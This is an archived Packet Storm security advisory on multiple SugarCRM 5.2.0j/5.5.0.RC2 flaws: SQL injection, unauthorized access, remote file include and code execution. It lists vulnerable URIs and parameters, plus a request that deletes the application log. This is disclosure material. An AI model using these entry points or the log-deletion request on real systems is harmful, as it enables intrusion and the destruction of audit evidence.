SugarCRM SQL Injection / Access / Code Execution

2009-12-01T00:00:00
ID PACKETSTORM:83302
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2009-12-01T00:00:00

Description

                                        
                                            `Author:  
Janek Vind 'waraxe'  
  
Vulnerable:  
SugarCRM SugarCRM 5.5.0.RC2  
SugarCRM SugarCRM 5.2.0j  
  
Product:  
http://www.sugarcrm.com/crm/  
  
Description:  
SugarCRM is prone to multiple remote vulnerabilities, including:  
  
1. Multiple SQL-injection vulnerabilities   
2. Multiple unauthorized access vulnerabilities   
3. A remote file-include vulnerability   
4. A remote code-execution vulnerability  
  
Exploiting these issues could allow an attacker to gain unauthorized access to the affected application, gain access to sensitive information, execute arbitrary PHP code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks are also possible.  
  
SugarCRM 5.2.0j and 5.5.0.RC2 are vulnerable; other versions may also be affected.  
  
  
POC:  
An attacker can exploit these issues through a browser  
  
The following example URIs are available:   
  
http://server/sugarce520j/index.php?module=Opportunities&action=index  
Opportunities2_OPPORTUNITY_offset  
  
http://server/sugarce520j/index.php?module=Project&action=index  
Project2_PROJECT_offset  
  
http://server/sugarce520j/index.php?module=Cases&action=index  
Cases2_CASE_offset  
  
http://server/sugarce520j/index.php?module=Bugs&action=index  
Bugs2_BUG_offset  
  
http://server/sugarce520j/index.php?module=Tasks  
Tasks2_TASK_offset  
  
http://server/sugarce520j/index.php?module=Meetings&action=index&return_module=Meetings&return_action=DetailView  
Meetings2_MEETING_offset  
  
http://server/sugarce520j/index.php?module=Calls&action=index&return_module=Calls&return_action=DetailView  
Calls2_CALL_offset  
  
http://server/sugarce520j/index.php?module=Notes&action=index&return_module=Notes&return_action=DetailView  
Notes2_NOTE_offset  
  
http://server/sugarce520j/index.php?entryPoint=HandleAjaxCall&method=remove&file=sugarcrm.log  
  
`